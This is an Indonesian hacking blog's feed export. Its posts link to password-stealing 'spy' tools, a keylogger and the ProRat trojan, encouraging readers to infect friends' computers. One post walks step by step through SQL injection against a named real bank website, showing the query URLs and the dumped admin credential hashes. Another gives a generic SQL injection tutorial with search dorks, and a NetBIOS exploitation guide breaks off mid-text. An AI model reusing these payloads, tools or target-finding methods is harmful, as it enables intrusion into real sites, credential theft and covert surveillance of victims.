NUGROHO</name><uri>http://www.blogger.com/profile/11717352810662256851</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_MsQe5Z6o5Hs/STNXBbJT0tI/AAAAAAAAABk/8qLwYy1DxyU/S220/DSC00200.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8795353331269225519.post-533475650188379376</id><published>2011-06-17T09:56:00.004+07:00</published><updated>2011-06-17T10:29:39.258+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='HACKER'/><title type='text'>PROGRAM SPY ( MATA MATA )</title><content type='html'>Pernah dengar tentang program mata mata yang biasa dipakai oleh FBI dan agen rahasia lainya?&lt;div&gt;berikut ini akan saya  berikan 2 buah program mata mata (spy)&lt;/div&gt;&lt;div&gt;1. pasword fox,  program ini akan menunjukan semua jenis pasword yang terekam pada firefox. cara kerjanya yaitu anda tinggal klik file aplikasinya maka program ini akan otomatis mencari pasword dari user yang pernah menggunakan firefox tersebut. berhati hatilah jika ada teman kamu yang pinjam laptopmu. bisa jadi di flashdisknya ada program ini. karena programnya yg portabel sehingga dapat disimpan di FD dan tinggal dijalankan saja.&lt;/div&gt;&lt;div&gt;2. google pasword decripter, program ini juga hampir sama dengan yang diatas hanya ada 2 macam yg portabel dan non portabel.&lt;/div&gt;&lt;div&gt;program diatas sangat berbahaya dan saya tidak bertanggungjawab atas pemakaian oleh orang yang tidak bertanggung jawab.&lt;/div&gt;&lt;div&gt;saran saya jangan pernah klik remember / ingat saya pada saat anda log in di sebuah website dengan user name dan paswordnya&lt;/div&gt;&lt;div&gt;waspadalah...... waspadalah...... waspadalah......&lt;/div&gt;&lt;div&gt;download paswordfox di : &lt;span class="Apple-style-span" style="color: rgb(0, 97, 111); font-family: Verdana; font-size: 12px; font-weight: bold; "&gt;&lt;a href="http://www.ziddu.com/download/15384879/passwordfox.zip.html" class="normal12blue" style="font-size: 12px; color: rgb(0, 106, 121); "&gt;&lt;b&gt;http://www.ziddu.com/download/15384879/passwordfox.zip.html&lt;/b&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;download google pasword decripter di : &lt;span class="Apple-style-span" style="color: rgb(0, 97, 111); font-family: Verdana; font-size: 12px; font-weight: bold; "&gt;&lt;b style="font-size: 12px; color: rgb(0, 106, 121); "&gt;&lt;a href="http://www.ziddu.com/download/15384880/GooglePasswordDecryptor.zip.html" class="normal12blue" style="font-size: 12px; color: rgb(0, 106, 121); "&gt;http://www.ziddu.com/download/15384880/GooglePasswordDecryptor.zip.html&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" &gt;&lt;span class="Apple-style-span" style="font-size: 12px; "&gt;&lt;b&gt;oh iya ini saya masih punya 11 tools mata mata yang biasa dipakai oleh agen FBI dan agen rahasia lainya silahkan kalian pelajari sendiri heheheheh. males jelasinya kebayakan.  silahkan download di :  &lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 97, 111); font-family: Verdana; font-size: 12px; font-weight: bold; "&gt;&lt;b style="font-size: 12px; color: rgb(0, 106, 121); "&gt;&lt;a href="http://www.ziddu.com/download/15384974/11FBITools.rar.html" class="normal12blue" style="font-size: 12px; color: rgb(0, 106, 121); "&gt;http://www.ziddu.com/download/15384974/11FBITools.rar.html&lt;/a&gt;  &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" &gt;&lt;span class="Apple-style-span" style="font-size: 12px; font-weight: 800; "&gt;saya tidak bertanggung jawab atas pemakaian dan penggunaan program ini. jika anda memakai berarti anda paham akan resikonya&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;Masukan nama dan alamat email&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8795353331269225519-533475650188379376?l=blognyajati.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blognyajati.blogspot.com/feeds/533475650188379376/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://blognyajati.blogspot.com/2011/06/program-spy-mata-mata.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/533475650188379376'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/533475650188379376'/><link rel='alternate' type='text/html' href='http://blognyajati.blogspot.com/2011/06/program-spy-mata-mata.html' title='PROGRAM SPY ( MATA MATA )'/><author><name>SAIKHUDIN JATI NUGROHO</name><uri>http://www.blogger.com/profile/11717352810662256851</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_MsQe5Z6o5Hs/STNXBbJT0tI/AAAAAAAAABk/8qLwYy1DxyU/S220/DSC00200.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8795353331269225519.post-9194229174547886500</id><published>2011-06-17T09:43:00.003+07:00</published><updated>2011-06-17T09:50:57.571+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='HACKER'/><title type='text'>KEYLOGER DAN ANTI KEYLOGER</title><content type='html'>&lt;span class="Apple-style-span" style="font-family: tahoma, Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; "&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "&gt;sudah pernah dengar keyloger ? yah program yang dapat merekam semua aktivitas yang kita lakukan. baik membuka program menulis email maupun mamasukan pasword dan program ini berjalan tanpa diketahui oleh pemilik komputer. berhati hatilah jangan sampai komputer kamu disisipi program ini karena semua rahasiamu akan terbongkarbagi yang ingin mencoba keyloger silahkan download di :&lt;span class="Apple-style-span" &gt;  &lt;a href="http://www.ziddu.com/download/12667955/setup.exe.html" target="_blank" style="text-decoration: underline; "&gt;http://www.ziddu.com/download/15384668/setup.exe.html&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "&gt;terus gimana kalo sampai kenakeylogger?  kamu jangan panik ada anti keyloger namanya keyscrumbler. yang mau anti keylogger silahkan didownload :&lt;a href="http://www.ziddu.com/download/12667956/KeyScrambler_Setup.exe.html" target="_blank" style="text-decoration: underline; "&gt;http://www.ziddu.com/download/12667956/KeyScrambler_Setup.exe.html&lt;/a&gt;&lt;/p&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;Masukan nama dan alamat email&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8795353331269225519-9194229174547886500?l=blognyajati.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blognyajati.blogspot.com/feeds/9194229174547886500/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://blognyajati.blogspot.com/2011/06/keyloger-dan-anti-keyloger.html#comment-form' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/9194229174547886500'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/9194229174547886500'/><link rel='alternate' type='text/html' href='http://blognyajati.blogspot.com/2011/06/keyloger-dan-anti-keyloger.html' title='KEYLOGER DAN ANTI KEYLOGER'/><author><name>SAIKHUDIN JATI NUGROHO</name><uri>http://www.blogger.com/profile/11717352810662256851</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_MsQe5Z6o5Hs/STNXBbJT0tI/AAAAAAAAABk/8qLwYy1DxyU/S220/DSC00200.JPG'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8795353331269225519.post-5847471496040927797</id><published>2011-01-08T06:18:00.002+07:00</published><updated>2011-01-08T06:20:33.565+07:00</updated><title type='text'>HACKING WITH PRORAT</title><content type='html'>Bagi kamu yang suka iseng ngejahilin komputer teman, nih aku kasih tools yang cocok buat kamu. Namanya ProRat. ProRat adalah salah satu tool hacking yang sangat luar biasa sekali. Tools ini buatan orang Turkey. Tools ini berfungsi untuk menyusup ke komputer orang lain. Caranya sangat gampang dan mudah sekali, tinggal kita mengetahui IP dan Port komputer korban saja, maka kita dapat langsung menginfeksinya. Selamat mencoba&lt;br /&gt;download &lt;a href="http://www.hacker-soft.net/Soft/Soft_11755.htm"&gt;Disini&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;Masukan nama dan alamat email&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8795353331269225519-5847471496040927797?l=blognyajati.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blognyajati.blogspot.com/feeds/5847471496040927797/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://blognyajati.blogspot.com/2011/01/hacking-with-prorat.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/5847471496040927797'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/5847471496040927797'/><link rel='alternate' type='text/html' href='http://blognyajati.blogspot.com/2011/01/hacking-with-prorat.html' title='HACKING WITH PRORAT'/><author><name>SAIKHUDIN JATI NUGROHO</name><uri>http://www.blogger.com/profile/11717352810662256851</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_MsQe5Z6o5Hs/STNXBbJT0tI/AAAAAAAAABk/8qLwYy1DxyU/S220/DSC00200.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8795353331269225519.post-889738255745101001</id><published>2010-12-03T11:19:00.001+07:00</published><updated>2010-12-03T11:22:08.518+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='HACKER'/><title type='text'>Hack Website menggunakan SQL injection</title><content type='html'>&lt;div style="text-align: center;"&gt;Hack Website menggunakan SQL injection&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Hai teman teman berikut ini adalah cara Web attack (hack website) menggunakan cara SQL injection. Ok langsung saja bisa kamu lihat di bawah ini :&lt;br /&gt;&lt;br /&gt;1. Menemukan target&lt;br /&gt;&lt;br /&gt;Kita dapat menemukan calon korban dengan bantuan search engine (Google masih yang terbaik) dengan memanfaatkan pola-pola tertentu. Pola-pola inilah yang disebut dengan Dork. Dork yang kita gunakan adalah untuk mencari pola yang berhubungan dengan SQL (Database) maka dork ini sering juga disebut dengan SQL Dork.&lt;br /&gt;&lt;br /&gt;N0LDR&lt;br /&gt;“Hal di atas merupakan alasan kuat bagi Admin untuk selalu update dengan isu keamanan karena kita bias saja menjadi korban walaupun kita tidak memiliki musuh. Dengan masuk ke daftar hasil pencarian maka kita telah menjadi calon korban”&lt;br /&gt;&lt;br /&gt;Perlu diketahui, dengan dork yang sama belum tentu kita mendapatkan calon korban yang sama ! Untuk tutorial ini, saya menggunakan Dork (Google bisa lebih banyak memberikan SQL Dork kepada anda dari pada diri saya sendiri ):&lt;br /&gt;&lt;br /&gt;Dork-Dork bisa kamu lihat disini Kumpulan Dork SQL Injection Update 2010&lt;br /&gt;&lt;br /&gt;Dari sekian banyak calon korban, maka:&lt;br /&gt;http://www.bankpapua.com/kantor.php?jenis=2&lt;br /&gt;merupakan target saya pada tutorial sederhana ini.&lt;br /&gt;&lt;br /&gt;N0LDR&lt;br /&gt;“Target sengaja tidak saya sensor agar PoC (Proof of Concept) pada tutorial ini jelas. Kepada para pembaca saya harapkan untuk tidak melakukan tindakan pengerusakan di kemudain hari pada web site ini. Ingat, dengan melakukan pengerusakan berarti anda membunuh karier terhormat anda di masa depan. Pergunakanlah sebatas pembelajaran”&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2. Mencari celah kelemahan&lt;br /&gt;&lt;br /&gt;Pengujian apakah calon korban memiliki kelemahan SQL atau tidak. Kita dapat menambahkan karakter minus (-) atau petik tunggal (‘) [tergantung pada sistem (- atau ‘)]pada query yang ada. Jika kita mendapatkan error berarti calon korban memiliki kelemahan terlepas dari bisa di injeksi lebih lanjut atau tidak.&lt;br /&gt;&lt;br /&gt;(-) ditambahkan sebelum item pada query seperti berikut:&lt;br /&gt;http://www.bankpapua.com/kantor.php?jenis=-2&lt;br /&gt;(‘) ditambahkan sesudah item pada query seperti berikut:&lt;br /&gt;http://www.bankpapua.com/kantor.php?jenis=2’&lt;br /&gt;&lt;br /&gt;Pada tutorial ini, teknik kedua yang memunculkan error! (berarti web site target memiliki kelemahan SQL Injection. Error yang kita dapatkan adalah:&lt;br /&gt;&lt;br /&gt;Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/sloki/user/u8543b/sites/bankpapua.com/www/kantor.php on line 118&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3. Mendapatkan jumlah kolom&lt;br /&gt;&lt;br /&gt;Tahap selanjutnya adalah mendapatkan jumlah kolom pada tabel aktif. Tekniknya adalah dengan menggunkan perintah order by sebagai berikut:&lt;br /&gt;&lt;br /&gt;http://www.bankpapua.com/kantor.php?jenis=2+order+by+1--&lt;br /&gt;http://www.bankpapua.com/kantor.php?jenis=2+order+by+2--&lt;br /&gt;http://www.bankpapua.com/kantor.php?jenis=2+order+by+3--&lt;br /&gt;http://www.bankpapua.com/kantor.php?jenis=2+order+by+4--&lt;br /&gt;http://www.bankpapua.com/kantor.php?jenis=2+order+by+5--&lt;br /&gt;.&lt;br /&gt;.&lt;br /&gt;.&lt;br /&gt;Kita lakukan pengujian satu persatu (boleh dilompat) hingga kita mendapatkan error yang berarti jumlah kolom terakhir (yang tidak error) merupakan jumlah kolom pada tabel aktif. Pada tutorial ini, kita mendapatkan error pada pengujian ke-6.&lt;br /&gt;&lt;br /&gt;http://www.bankpapua.com/kantor.php?jenis=2+order+by+6--&lt;br /&gt;&lt;br /&gt;Kita mendapatkan error:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/sloki/user/u8543b/sites/bankpapua.com/www/kantor.php on line 118&lt;br /&gt;&lt;br /&gt;Berarti jumlah kolom pada tabel aktif adalah 5 (pengujian terakhir yang tidak error)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;4. Mendapatkan angka keberuntungan&lt;br /&gt;&lt;br /&gt;Angka keberuntungan adalah angka yang dimunculkan oleh sistem yaitu angka antara range jumlah kolom aktif (dalam kasus ini 1-5). Perintah yang kita gunakan adalah union select sebagai berikut:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.bankpapua.com/kantor.php?...C2%2C3%2C4%2C5--&lt;br /&gt;&lt;br /&gt;[Jangan lupa menambahkan karakter minus (-) pada awal key (pada kasus kita, key adalah 2)]. Kita mendapatkan angka 1,2,3, dan 4. Di angka-angka inilah tempat kita melakukan query.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;5. Mendapatkan versi database server&lt;br /&gt;&lt;br /&gt;Dapatkan versi server SQL (dalam kasus ini, MySQL) dengan perintah version(), atau @@version. Kita gunakan version() dan kita pilih angka 4:&lt;br /&gt;&lt;br /&gt;http://www.bankpapua.com/kantor.php?...%2C3%2Cversion(),5--&lt;br /&gt;&lt;br /&gt;Kita mendapatkan 5.0.51a-24+lenny4 yang berarti MySQL versi 5. Kita sedikit beruntung karena menemukan versi 5 jika versi 4 maka tahap berikutnya adalah “Tebak-tebak buah nanas”.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;6. Mendapatkan nama tabel&lt;br /&gt;&lt;br /&gt;Gunakan perintah group_concat(table_name) dengan penyeleksian dari information_schema.tables sebagai berikut:&lt;br /&gt;&lt;br /&gt;http://www.bankpapua.com/kantor.php?...2Cgroup_concat(table_name),5+from+information_schema.tables+wher e+table_schema=database()--&lt;br /&gt;&lt;br /&gt;Kita mendapatkan nama-nama tabel sebagai berikut:&lt;br /&gt;adunasabah,agenda,anual,atm,atmprima,atmsama,berit a,birate,bunga,&lt;br /&gt;galery,kantor,karir,kontak,konter,kurs,lapkeu,link ers,manajemen,pesertaquiz,&lt;br /&gt;polling_d,polling_h,produk,promo,quiz_peserta,quiz _soal,regulasi,tamu,users. Dari sekian banyak kita pilih tabel users namun harus dikonversi ke heksadesimal terlebih dahulu. Silahkan kunjungi:&lt;br /&gt;&lt;br /&gt;http://www.dolcevie.com/js/converter.html&lt;br /&gt;&lt;br /&gt;kemudian kita mendapatkan (titik dua ( tidak diikutsertakan) users(ascii) -&gt; 7573657273(hex)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;7. Mendapatkan nama kolom&lt;br /&gt;&lt;br /&gt;Gunakan perintah group_concat(column_name) dengan penyeleksian dari information_schema.columns sebagai berikut:&lt;br /&gt;&lt;br /&gt;http://www.bankpapua.com/kantor.php?...2Cgroup_concat(column_name),5+from+information_schema.columns+wh ere+table_name=0x7573657273--&lt;br /&gt;&lt;br /&gt;0x7573657273 kita dapatkan dengan menggabungkan 0x dengan 7573657273 (hasil konversi tadi). Kita mendapatkan nama-nama kolom sebagai berikut:&lt;br /&gt;ids,username,password,fullname,address,a_add,a_edi t,a_del,topadmin,akses. Kita pilih username dan password.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;8. Mendapatkan Data&lt;br /&gt;&lt;br /&gt;Gunakan perintah group_concat(username,0x3a,password) dengan penyeleksian tabel users tadi sebagai berikut:&lt;br /&gt;&lt;br /&gt;http://www.bankpapua.com/kantor.php?...2Cgroup_concat(username,0x3a,password),5+from+users--&lt;br /&gt;&lt;br /&gt;Kita mendapatkan:&lt;br /&gt;&lt;br /&gt;webmaster:    †¥²¯d”¥´¹¥¥¨±¬²»©¦£vttz&lt;br /&gt;sdm:         †¥²¯d”¥´¹¥•¨±uvw&lt;br /&gt;sekper:           †¥²¯d”¥´¹¥•©¯´©¶uvw&lt;br /&gt;&lt;br /&gt;Terenkripsi   Tahap berikutnya adalah mendapatkan plain text dari password yang terenkripsi, google! Setelah dapat, cari halaman admin kemudian login dengan account webmaster, Anda telah berhasil take over http://www.bankpapua.com/&lt;br /&gt;&lt;br /&gt;N0LDR&lt;br /&gt;“Tutorial ini hanya sebagai pembelajaran semata. Hacking is good”&lt;br /&gt;sumber : jasakom.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Artikel Asli Berjudul Hack Website menggunakan SQL injection&lt;br /&gt;di www.perwira28.blogspot.com&lt;br /&gt;Under Creative Commons License: Attribution Non-Commercial&lt;div class="blogger-post-footer"&gt;Masukan nama dan alamat email&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8795353331269225519-889738255745101001?l=blognyajati.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blognyajati.blogspot.com/feeds/889738255745101001/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://blognyajati.blogspot.com/2010/12/hack-website-menggunakan-sql-injection.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/889738255745101001'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/889738255745101001'/><link rel='alternate' type='text/html' href='http://blognyajati.blogspot.com/2010/12/hack-website-menggunakan-sql-injection.html' title='Hack Website menggunakan SQL injection'/><author><name>SAIKHUDIN JATI NUGROHO</name><uri>http://www.blogger.com/profile/11717352810662256851</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_MsQe5Z6o5Hs/STNXBbJT0tI/AAAAAAAAABk/8qLwYy1DxyU/S220/DSC00200.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8795353331269225519.post-7875522534065886307</id><published>2010-02-23T12:23:00.000+07:00</published><updated>2010-02-23T12:24:14.450+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='HACKER'/><title type='text'>LATIHAN HACK INJEK SQL</title><content type='html'>SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.&lt;br /&gt;&lt;br /&gt;Nah itu artinya SQL Injection, untuk translate ke bahasa sesuai yg ada mengerti silahkan di translate sendiri. :D.&lt;br /&gt;Ok, SQL Injection itu sendiri dapat terjadi oleh beberapa faktor, di antaranya kesalahan setting pada server yang memungkinkan seorang attacker memasukkan karakter dan baris perintah yg membahayakan bagi program, selain itu juga kesalahan dalam coding yg tidak memfilter karakter yg diinputkan oleh user.&lt;br /&gt;&lt;br /&gt;Sudah cukup basa basinya.. sekarang sedikit tutorialnya.. :D.&lt;br /&gt;Pertama., carilah sasaran yang mau di injek - injek SQL nya.. Lha nyarinya dimana mas?? tanya lah pada rumput yg bergoyang dombret nyarinya… wjwkwkwkwk.. Nyari di google, misal’e dengan kata kunci&lt;br /&gt;&lt;br /&gt;    inurl:news.php?id= site:com&lt;br /&gt;&lt;br /&gt;Nah.. buanyak bgt kan hasilnya…. sekarang tinggal kita coba satu buat test..&lt;br /&gt;Misal kita menemukan sebuah site dengan alamat sebagai berikut….&lt;br /&gt;&lt;br /&gt;    http://www.target.com/english/news.php?id=64&lt;br /&gt;&lt;br /&gt;Tahap selanjutnya mari kita tambahkan tanda petik (’) diakhir angka 64.. Ups… ternyata muncul kek gini..&lt;br /&gt;&lt;br /&gt;    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1&lt;br /&gt;&lt;br /&gt;Mungkin pada nanya.. mangnya kenapa kalo muncul kek gitu mas..?? Ya itu tandanya error kawand… dah nemu yg asyik error nya.. mari kita lanjutkan ketahap berikutnya.., Ilangkan saja tanda ‘ nya, ganti dengan tanda - (minus) jadi seperti berikut&lt;br /&gt;&lt;br /&gt;    http://www.target.com/english/news.php?id=-64+order+by+100–&lt;br /&gt;    Keterangan : angka 100 itu untuk mencari field nya, tanda minus double di belakang digunakan untuk memberikan Comment pada Mysql Query sehingga sistem tidak akan menjalankan perintah selanjutnya.&lt;br /&gt;&lt;br /&gt;setelah ditulis kek gitu… ternyata terdapat error.. like this&lt;br /&gt;&lt;br /&gt;    Unknown column ‘100' in ‘order clause’&lt;br /&gt;&lt;br /&gt;Weeh… Column 100 ndak ada katanya… kita perkecil lagi… coba angka angka misal 10,9 dll ok. Sampai dia tidak memunculkan error unknown column tadi… Setelah di dapat angka yang tidak memunculkan error trus langkah selanjutnya  kepriben kiye… (walah boso ngendi maneh.. @_@)…&lt;br /&gt;&lt;br /&gt;Buat langkah selanjutnya marih kita select column column tersebut. Lha nyara select nya piye, begini, mari kita coba dengan cara yg sederhana.. misalnya tadi g ada error di coloum 9 so, perintahnya like this&lt;br /&gt;&lt;br /&gt;    http://www.target.com/english/news.php?id=-64+union+select+1,2,3,4,5,6,7,8,9–&lt;br /&gt;&lt;br /&gt;Ok, dah running querynya di address bar, tunggu beberapa saat dan berharaplah akan muncul suatu mukjizat.. wkwkwkwkwkwkw. Nah setelah loading selesai, liad di browser, angka berapa ajah yg muncul… (tempat munculnya di tempat seharusnya artikel ato berita muncul). Misal’e yang muncul tuh angka 3, mari kita explore lebih jauh lagi… kita lihat versi dari databasenya. caranya dengan menjalakan seperti ini&lt;br /&gt;&lt;br /&gt;    http://www.target.com/english/news.php?id=-64+union+select+1,2,version(),4,5,6,7,8,9–&lt;br /&gt;&lt;br /&gt;Nah, setelah itu bakal muncul deh versi dari databasenya, bisa aja versinya 5.2, ato 4.0 atau yg lainnya. Setelah dapet versi databasenya, lanjutin deh buat ngedapetin yang namanya table - table nya. Lha caranye gimana Om??? Wes ga usah panjang x lebar, tar jadi luas wkwkwkw… Untuk mysql versi 5, kita bisa manfaatin yang namanya Information_schema, nah kalo versi 4, ya kita hanya bisa berdoa dan berharap alias maen tebak tebakan… wkwkwkwkwkw.&lt;br /&gt;&lt;br /&gt;Buat mencari nama table table nya bisa kita lakuin dengan cara seperti ini.&lt;br /&gt;&lt;br /&gt;    http://www.target.com/english/news.php?id=-64+union+select+1,2,group_concat(table_name),4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()–&lt;br /&gt;&lt;br /&gt;Query diatas bakal menghasilkan nama nama table yg ada di database sesuai dengan nama database yg di gunakan, dan sudah dech kita tinggal pilih table mana yg bakal kita extract colom2 nya dan buat kita cari isi dari colom2 nya.. :D. . Lha cara mengetahui column nya gmn mas??? Nah lho.. lom taut  tho… Ok, buat cari tau nama nama column nya kita butuh bantuin sebuah alat yg gunanya buat meng-convert code ascii ke hexa, gunanya buat mengambil nama column berdasar nama table nya..&lt;br /&gt;&lt;br /&gt;Nh tak kasih sekalian website yg nyedian fasilitas buat ngonvert hexa to ascii, bisa di coba di http://centricle.com/tools/ascii-hex/ tinggal kalian masukin nama table dah jadi dech kode ascii nya.. :D dan kita tinggal meng-query buat ngedapetin nama column nya seperti ini&lt;br /&gt;&lt;br /&gt;    http://www.target.com/english/news.php?id=-64+union+select+1,2,group_concat(column_name),4,5,6,7,8,9+from+information_schema.columns+where+table_name=0xCODEASCITABLE–&lt;br /&gt;&lt;br /&gt;Binggo…!!! kita udah ngedapetin nama nama column nya… tinggal deh men-select isinya…&lt;br /&gt;&lt;br /&gt;    http://www.target.com/english/news.php?id=-64+union+select+1,2,group_concat(nama_column1,0×3a,nama_column2,0×3a,column3),4,5,6,7,8,9+from+nama_tabel–&lt;br /&gt;&lt;br /&gt;    arti 0×3a : menampilkan karakter : (titik dua).&lt;br /&gt;&lt;br /&gt;Dah.. kita dah dapet isi dari table table… tinggal dilanjutin sendiri…&lt;br /&gt;&lt;br /&gt;dah selesai ya…&lt;br /&gt;&lt;br /&gt;Happi testing esngiel injecktion ya…&lt;div class="blogger-post-footer"&gt;Masukan nama dan alamat email&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8795353331269225519-7875522534065886307?l=blognyajati.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blognyajati.blogspot.com/feeds/7875522534065886307/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://blognyajati.blogspot.com/2010/02/latihan-hack-injek-sql.html#comment-form' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/7875522534065886307'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/7875522534065886307'/><link rel='alternate' type='text/html' href='http://blognyajati.blogspot.com/2010/02/latihan-hack-injek-sql.html' title='LATIHAN HACK INJEK SQL'/><author><name>SAIKHUDIN JATI NUGROHO</name><uri>http://www.blogger.com/profile/11717352810662256851</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_MsQe5Z6o5Hs/STNXBbJT0tI/AAAAAAAAABk/8qLwYy1DxyU/S220/DSC00200.JPG'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8795353331269225519.post-3581219414589422209</id><published>2010-02-23T12:17:00.000+07:00</published><updated>2010-02-23T12:18:18.284+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='HACKER'/><title type='text'>MEREMOTE KOMPUTER ORANG</title><content type='html'>Pernah dengar istilah NetBIOS over TCP/IP?Kalau sudah, sebaiknya lewatkan saja tulisan ini Dan jika belom boleh disimak :)&lt;br /&gt;    Tulisan ini tujuan hanya sebagai pembelajaran saja dan agar dapat kita selalu berhati hati. :) Informasi NetBios sebenarnya dapat kita pakai untuk exploitasi sistem lawan dan berikut ini suatu caruntuk exploitasi target yang menggunakan file/printer sharring&lt;br /&gt;&lt;br /&gt;    Dalam tulisan ini saya asumsikan anda menggunakan win 98&lt;br /&gt;    Sebelum kita mulai coba kita find nbtstat.exe&lt;br /&gt;    Sebenarnya fungsi file tersebut adalah untuk menampilkan statistik protokol dan koneksi tcp/ip&lt;br /&gt;&lt;br /&gt;    Langkah langkah exploitasi :)&lt;br /&gt;    1. Click Start--&gt;Program--&gt;MS-Dos prompt--&gt; tulis nbtstat lalu enter&lt;br /&gt;    2. Click Start--&gt;Run--&gt;tulis nbtstat lalu OK&lt;br /&gt;&lt;br /&gt;    Kira kira mucul sperti ini :&lt;br /&gt;    NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n] [-r] [-R] [-RR] [-s] [-S][interval] ]&lt;br /&gt;&lt;br /&gt;    -a (adapter status) Lists the remote machine's name table given its name&lt;br /&gt;    -A (Adapter status) Lists the remote machine's name table given its IP address.&lt;br /&gt;    -c (cache) Lists NBT's cache of remote [machine] names and their IP addresses&lt;br /&gt;    -n (names) Lists local NetBIOS names.&lt;br /&gt;    -r (resolved) Lists names resolved by broadcast and via WINS&lt;br /&gt;    -R (Reload) Purges and reloads the remote cache name table&lt;br /&gt;    -S (Sessions) Lists sessions table with the destination IP addresses&lt;br /&gt;    -s (sessions) Lists sessions table converting destination IP addresses to computer NETBIOS names.&lt;br /&gt;    -RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refresh&lt;br /&gt;&lt;br /&gt;    RemoteName Remote host machine name.&lt;br /&gt;    IP address Dotted decimal representation of the IP address.&lt;br /&gt;    interval Redisplays selected 